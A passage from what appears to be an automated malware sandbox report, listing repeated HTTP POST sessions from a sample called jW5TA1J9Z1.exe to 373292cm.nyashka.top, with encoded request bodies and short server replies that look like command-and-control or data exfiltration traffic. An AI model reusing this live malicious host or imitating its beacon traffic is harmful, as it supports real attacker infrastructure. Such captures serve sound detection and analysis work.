                                                                    Aug 21, 2024 10:04:11.847393036 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    69192.168.2.75302780.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:11.983468056 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:12.334161997 CEST2536OUTData Raw: 5a 56 59 50 54 43 54 59 5b 5f 5a 51 59 57 58 56 57 5a 5d 5c 57 5c 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZVYPTCTY[_ZQYWXVWZ]\W\STYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/B5_49=>(_?\)= 7<4" ()#] V&..&F$.Y/!
                                                                    Aug 21, 2024 10:04:12.649255037 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:12.847677946 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    70192.168.2.75302880.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:12.977318048 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:13.334027052 CEST2544OUTData Raw: 5f 50 5c 5f 51 43 54 5b 5b 5f 5a 51 59 51 58 5e 57 5b 5d 5f 57 5a 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _P\_QCT[[_ZQYQX^W[]_WZSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.835=4_ 5*-]?.^?7< 7 ?)'^"3%]/&F$.Y/=
                                                                    Aug 21, 2024 10:04:13.380623102 CEST1236OUTData Raw: 09 3f 50 14 3a 37 0c 22 34 3d 31 27 38 3c 06 5a 02 31 2b 13 38 06 31 3b 0c 39 1b 1b 3c 04 06 5c 30 01 2f 16 3a 05 17 3a 34 5f 3e 57 26 3f 27 21 12 2a 20 20 30 00 25 0f 2c 06 3e 1f 34 56 0f 2e 08 28 53 15 32 5b 09 2d 35 2e 0c 09 33 3c 20 2f 09 39
                                                                    Data Ascii: ?P:7"4=1'8<Z1+81;9<\0/::4_>W&?'!* 0%,>4V.(S2[-5.3< /9_.89.9 -R=\;:&3E3V5=)??%PC#6$3?7+1:9#<9;10[U<,"#>T;=W&,_4=17>$<683?9?]V;:1Y5,'(2&2081X??<!,!Z2* %
                                                                    Aug 21, 2024 10:04:13.633814096 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:13.761475086 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    71192.168.2.75303080.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:14.093946934 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:14.443429947 CEST2544OUTData Raw: 5a 51 5c 5f 54 42 54 50 5b 5f 5a 51 59 53 58 53 57 5e 5d 5a 57 5e 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZQ\_TBTP[_ZQYSXSW^]ZW^S^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U._;3 5 *4<![(#,4#*9;#"/.&F$.Y/5
                                                                    Aug 21, 2024 10:04:14.748673916 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:14.877492905 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    72192.168.2.75303180.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:14.731683969 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:15.088428974 CEST1868OUTData Raw: 5a 50 5c 55 54 41 51 5c 5b 5f 5a 51 59 54 58 5e 57 5d 5d 59 57 58 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZP\UTAQ\[_ZQYTX^W]]YWXSXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.Y8U#!-$\40=Y>.<(=[(\ P?:; 9_..&F$.Y/)
                                                                    Aug 21, 2024 10:04:15.409902096 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:15.541707039 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 1f 28 36 2e 58 32 38 38 55 30 23 25 0e 3d 3e 37 59 3e 3d 39 17 27 28 21 1a 26 58 3c 56 27 05 21 5d 3c 2e 26 52 31 06 33 5c 2d 1e 2b 5d 0c 13 21 05 20 03 26 5a 31 02 0e 5b 3e 06 0e 07 22 3f 29 05 2b 04 36 0d 2b 01 2b 00 3f 29 09 59 3c 04 2a 1f 2e 2b 36 05 2f 20 22 1c 34 04 2b 52 0d 11 27 0b 29 3d 3d 1f 3d 2e 27 5d 23 2b 2c 02 24 03 00 1e 32 54 2e 55 24 5f 2c 11 25 32 17 51 33 1f 29 55 25 15 3e 5e 26 06 21 56 23 32 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &(6.X288U0#%=>7Y>=9'(!&X<V'!]<.&R13\-+]! &Z1[>"?)+6++?)Y<*.+6/ "4+R')===.']#+,$2T.U$_,%2Q3)U%>^&!V#2#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    73192.168.2.75303280.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:15.008774042 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:15.369223118 CEST2536OUTData Raw: 5a 50 5c 56 51 47 51 5c 5b 5f 5a 51 59 57 58 54 57 5a 5d 5d 57 5f 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZP\VQGQ\[_ZQYWXTWZ]]W_SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.8 5>4X #)*>4<=%<>?47$S+)870=/>&F$.Y/)
                                                                    Aug 21, 2024 10:04:15.668579102 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:15.878741980 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    74192.168.2.75303380.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:16.007853985 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:16.365576029 CEST2544OUTData Raw: 5a 57 59 57 54 48 54 59 5b 5f 5a 51 59 56 58 51 57 5d 5d 5b 57 5a 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZWYWTHTY[_ZQYVXQW]][WZS]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.,#@!37:)?(>^+[#Z /#P!20(9 0,&F$.Y/!
                                                                    Aug 21, 2024 10:04:16.665746927 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:16.794998884 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    75192.168.2.75303480.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:17.107692003 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:17.458954096 CEST2544OUTData Raw: 5f 50 59 54 51 45 54 5d 5b 5f 5a 51 59 5f 58 50 57 5b 5d 58 57 50 53 5b 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _PYTQET][_ZQY_XPW[]XWPS[YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.;#;E!( 3"*-?-?8#? !+9X"08>&F$.Y/
                                                                    Aug 21, 2024 10:04:18.747306108 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:18.748070955 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:04:18.748153925 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:04:18.748768091 CEST183INHTTP/1.1 100 Continue
                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 31 20 41 75 67 20 32 30 32 34 20 30 38 3a 30 34 3a 31 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 3b 55 5f 5b
                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Wed, 21 Aug 2024 08:04:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive;U_[
                                                                    Aug 21, 2024 10:04:18.749412060 CEST183INHTTP/1.1 100 Continue
                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 31 20 41 75 67 20 32 30 32 34 20 30 38 3a 30 34 3a 31 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 3b 55 5f 5b
                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Wed, 21 Aug 2024 08:04:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    76192.168.2.75303580.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:18.868534088 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:19.224694967 CEST2544OUTData Raw: 5f 54 59 54 54 49 51 59 5b 5f 5a 51 59 5f 58 5e 57 5f 5d 53 57 5f 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _TYTTIQY[_ZQY_X^W_]SW_STYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.;#,!<40>>?(++7$ "3<_8##>;&F$.Y/
                                                                    Aug 21, 2024 10:04:19.255691051 CEST1236OUTData Raw: 09 3f 50 14 3a 37 0c 22 34 3d 31 27 38 3c 06 5a 02 31 2b 13 38 06 31 3b 0c 39 1b 1b 3c 04 06 5c 30 01 2f 16 3a 05 17 3a 34 5f 3e 57 26 3f 27 21 12 2a 20 20 30 00 25 0f 2c 06 3e 1f 34 56 0f 2e 08 28 53 15 32 5b 09 2d 35 2e 0c 09 33 3c 20 2f 09 39
                                                                    Data Ascii: ?P:7"4=1'8<Z1+81;9<\0/::4_>W&?'!* 0%,>4V.(S2[-5.3< /9_.89.9 -R=\;:&3E3V5=)??%PC#6$3?7+1:9#<9;10[U<,"#>T;=W&,_4=17>$<683?9?]V;:1Y5,'(2&2081X??<!,!Z2* %
                                                                    Aug 21, 2024 10:04:19.531100988 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:19.918987989 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:04:19.944878101 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    77192.168.2.75303680.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:20.040838003 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:20.449841976 CEST2544OUTData Raw: 5a 57 5c 5e 54 46 54 5d 5b 5f 5a 51 59 5f 58 5f 57 5b 5d 5f 57 5c 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZW\^TFT][_ZQY_X_W[]_W\S]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/3E"-"3&><+.<;7?7!! ?9"0/.&F$.Y/


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    78192.168.2.75303780.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:20.582236052 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:20.927617073 CEST1868OUTData Raw: 5f 55 5c 5f 54 44 54 5c 5b 5f 5a 51 59 55 58 52 57 5c 5d 5b 57 5e 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _U\_TDT\[_ZQYUXRW\][W^S]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/#863"3"* +.&+=']#<#!"<P(9]"0;&F$.Y/-
                                                                    Aug 21, 2024 10:04:21.237097025 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:21.365623951 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 25 0e 3e 0b 21 00 26 15 0d 0c 33 1d 3e 53 29 2d 02 07 29 13 07 15 27 5e 22 04 25 10 3f 08 27 2b 03 12 3f 3d 39 0e 26 3c 23 5d 39 0e 2b 5d 0c 13 22 5d 23 2a 2e 5d 26 02 37 01 3d 38 2b 5c 21 5a 22 5c 2b 2a 08 09 28 01 28 5e 3f 5f 38 00 3f 03 2e 54 2f 28 3a 06 2d 09 36 50 22 3e 2b 52 0d 11 27 0f 2b 03 03 56 3d 00 38 05 36 3b 2c 02 24 13 3d 08 31 0b 3e 10 27 2a 24 1f 32 32 35 57 27 21 0f 50 31 05 2e 5b 25 11 35 12 23 32 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: %>!&3>S)-)'^"%?'+?=9&<#]9+]"]#*.]&7=8+\!Z"\+*((^?_8?.T/(:-6P">+R'+V=86;,$=1>'*$225W'!P1.[%5#2#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    79192.168.2.75303880.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:20.771802902 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:21.130862951 CEST2544OUTData Raw: 5a 52 59 50 51 45 54 51 5b 5f 5a 51 59 51 58 50 57 5e 5d 52 57 5c 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZRYPQETQ[_ZQYQXPW^]RW\SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/ 6>;"0"*.7+-!(>#",< 28P?)77/>&F$.Y/=
                                                                    Aug 21, 2024 10:04:21.474334002 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:21.609325886 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    80192.168.2.75303980.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:04:21.742970943 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
